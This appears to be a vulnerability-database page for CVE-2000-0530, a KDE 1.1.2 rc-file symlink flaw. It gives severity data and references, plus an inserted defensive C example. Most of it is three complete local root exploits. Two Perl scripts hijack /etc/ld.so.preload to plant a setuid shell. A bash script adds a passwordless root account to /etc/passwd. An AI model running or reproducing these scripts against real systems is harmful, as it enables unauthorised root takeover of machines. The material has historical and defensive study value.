CVE-2000-0530
CVSS 7.2
Published: 2000-05-31 00:00:00
Revised: 2008-09-05 16:21:14
NMCOE    

[Original] The KApplication class in the KDE 1.1.2 configuration file management capability allows local users to overwrite arbitrary files.


[CNNVD] KDE 1.1.2 KApplication arbitrary file overwrite vulnerability (CNNVD-200005-110)

The KApplication class in the configuration file management feature of KDE 1.1.2 allows local users to overwrite arbitrary files.

- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:kde:kde:1.1.2
cpe:/o:caldera:openlinux:2.4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0530
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0530
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-110
(Official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/4583.php
(VENDOR_ADVISORY)  XF  kde-configuration-file-creation
http://www.securityfocus.com/bid/1291
(VENDOR_ADVISORY)  BID  1291
http://archives.neohapsis.com/archives/bugtraq/2000-05/0387.html
(VENDOR_ADVISORY)  BUGTRAQ  20000531 KDE::KApplication feature?
http://www.redhat.com/support/errata/RHSA-2000-032.html
(UNKNOWN)  REDHAT  RHSA-2000:032
ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-015.0.txt
(UNKNOWN)  CALDERA  CSSA-2000-015.0

- Vulnerability information

KDE 1.1.2 KApplication arbitrary file overwrite vulnerability
High risk  Unknown
2000-05-31 00:00:00 2005-05-02 00:00:00
Local
The KApplication class in the configuration file management feature of KDE 1.1.2 allows local users to overwrite arbitrary files.
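Added example (not KDE code and not taken from any advisory on this page): the defect the exploit notes below describe is a privileged KDE program creating and chowning the user's rc file through a path the user controls, so a symlink planted at ~/.kde/share/config/<app>rc redirects the operation to a system file. The C below shows the defensive open pattern (O_NOFOLLOW, then fstat on the descriptor rather than stat on the path) beside a constructed symlink scenario; the function names open_rc_file_safely and demo and the temp-dir paths are assumptions made for this example.

```c
#define _GNU_SOURCE   /* expose mkdtemp() and symlink() prototypes on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open (creating if absent) a per-user rc file. O_NOFOLLOW makes open()
 * fail with ELOOP when the final component is a symlink, so a planted link
 * cannot redirect the write; fstat() on the fd (not stat() on the path)
 * then confirms a regular file owned by `owner` with no check-then-use gap.
 * A setuid program should call this only after seteuid(getuid()), so that
 * a freshly created file is owned by the user, not root. Returns fd or -1. */
int open_rc_file_safely(const char *path, uid_t owner)
{
    int fd = open(path, O_RDWR | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != owner) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario in a fresh temp dir: "ktvisionrc" is a symlink to a
 * victim file (the pattern the exploits use against /etc/ld.so.preload and
 * /etc/passwd); "ktunerrc" is a genuine rc file. Returns 1 only if the
 * safe open rejects the symlink with ELOOP and accepts the real file. */
int demo(void)
{
    char dir[] = "/tmp/kderc-demo-XXXXXX", victim[64], link[64], real[64];
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/ktvisionrc", dir);
    snprintf(real, sizeof real, "%s/ktunerrc", dir);
    int v = open(victim, O_WRONLY | O_CREAT, 0600);
    if (v < 0 || symlink(victim, link) < 0)
        return 0;
    close(v);
    int bad = open_rc_file_safely(link, getuid());  /* expect -1, ELOOP */
    int bad_errno = errno;
    int good = open_rc_file_safely(real, getuid()); /* expect a valid fd */
    int ok = bad < 0 && bad_errno == ELOOP && good >= 0;
    if (good >= 0) close(good);
    unlink(link); unlink(victim); unlink(real); rmdir(dir);
    return ok;
}
```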

- Advisories and patches


- Vulnerability information (19979)

KDE 1.1.2 KApplication configfile vulnerability (1) (EDBID:19979)
linux local
2000-05-31 Verified
0 kil3r
N/A
source: http://www.securityfocus.com/bid/1291/info

The KDE configuration-file management has a bug which could result in root compromise.

Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs.

Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges.

#!/usr/bin/perl

#
# 7350ktvision! The ktvision-hack. 
#
# Just execute. Gives instant rootshell kiddie!
# If only ktvision is setuid-root and vulnerable as with
# SuSE 6.4!
#
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
# Special greets to that beautiful black-dressed woman at
# the bus stop. This one is for you. :)
# 

my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktvisionrc";

$ENV{"PATH"}.=":/opt/kde/bin";

print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";

print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>

int time(void *v)
{
	chown("/tmp/boomsh", 0, 0);
	chmod("/tmp/boomsh", 06755);
	unlink("/etc/ld.so.preload");
	exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;

open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main() 
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;

umask 0;

unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;

print "Invoking vulnerable program (ktvision)...\n";

if (fork() == 0) {
	`ktvision`;
	exit 0;
} else {
	sleep(3);
	kill 9, `pidof ktvision`;
}

open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
`/usr/bin/passwd`;

# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");

- Vulnerability information (19980)

KDE 1.1.2 KApplication configfile vulnerability (2) (EDBID:19980)
linux local
2000-05-31 Verified
0 kil3r
N/A
source: http://www.securityfocus.com/bid/1291/info
 
The KDE configuration-file management has a bug which could result in root compromise.
 
Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs.
 
Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges.

#!/usr/bin/perl

#
# 7350ktuner! The ktuner-hack. 
# (a.k.a. kil3r for some reason :)
#
# Just execute. Gives instant rootshell kiddie!
# If only ktuner is setuid-root and vulnerable as with
# SuSE 6.4!
#
# When has this stupid race an end?
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
# 

my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktunerrc";

$ENV{"PATH"}.=":/opt/kde/bin";

print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";

print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>

int time(void *v)
{
	chown("/tmp/boomsh", 0, 0);
	chmod("/tmp/boomsh", 06755);
	unlink("/etc/ld.so.preload");
	exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;

open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main() 
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;

umask 0;

unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;

print "Invoking vulnerable program (ktuner)...\n";

if (fork() == 0) {
	`ktuner`;
	exit 0;
} else {
	sleep(3);
	kill 9, `pidof ktuner`;
}

open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
`/usr/bin/passwd`;

# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");

- Vulnerability information (19981)

KDE 1.1.2 KApplication configfile vulnerability (3) (EDBID:19981)
linux local
2000-05-31 Verified
0 IhaQueR
N/A
source: http://www.securityfocus.com/bid/1291/info
  
The KDE configuration-file management has a bug which could result in root compromise.
  
Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs.
  
Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges.


#!/bin/bash

link=/home/paul/.kde/share/config
linkto=/etc/passwd
target=/opt/kde/bin/ktvision

echo ""
echo "KTVision <= 0.1.1-271 local r00t exploit by IhaQueR"
echo ""

if ! test -u $target ; then
        echo "[-] $target not found"
        exit 1
fi;

echo "[+] $target found"

rm -f sush*
cat <<__DUPA__>>sush.c
#include <stdio.h>
main()
{
        setuid(geteuid());
        setgid(getegid());
        execl("/bin/bash", "/bin/bash", NULL);
}
__DUPA__

echo "    compiling sush"
res=$(gcc sush.c -o sush)

if test "$res" != "" -o ! -x sush ; then
        echo "[-] failed"
        rm sush* ktvback.*
        exit 2;
fi;

echo "[+] success"

cp $linkto ktvback.$$
mkdir -p $link
rm -f $link/ktvisionrc
ln -s $linkto $link/ktvisionrc

echo ""
echo -n "now running... (ensure that X is up and running)"

$target >/dev/null 2>&1 &
cpid=$!

declare -i cnt
declare -i max
cnt=0
max=60

while ! test -O $linkto ; do
        sleep 1;
        printf "  %.2d" $cnt
        cnt=$(($cnt+1))
        if test $cnt -ge $max ; then
                echo ""
                echo ""
                echo "[-] FAILED"
                rm sush* ktvback.*
                exit 2;
        fi;
done;

kill -9 $cpid >/dev/null 2>&1
rm $link/ktvisionrc

echo ""
echo ""
echo "[+] SUCCESS, creating sush"
echo >>$linkto "r00t::0:0:root:/root:/bin/bash"
echo ""
su r00t -c "chown 0.0 sush; chmod u+s sush; chmod g+s sush; cp
ktvback.$$ $linkto; chown 0.0 $linkto"
rm ktvback.* sush.c

if ! test -u sush ; then
        echo "    hm strange error"
        rm sush* ktvback.*
        exit 1
fi;

echo ""
echo "starting ./sush"
./sush

#!plonk

- Vulnerability information

1372
KDE KApplication-class Program Arbitrary File Creation
Local Access Required Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2000-05-31 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete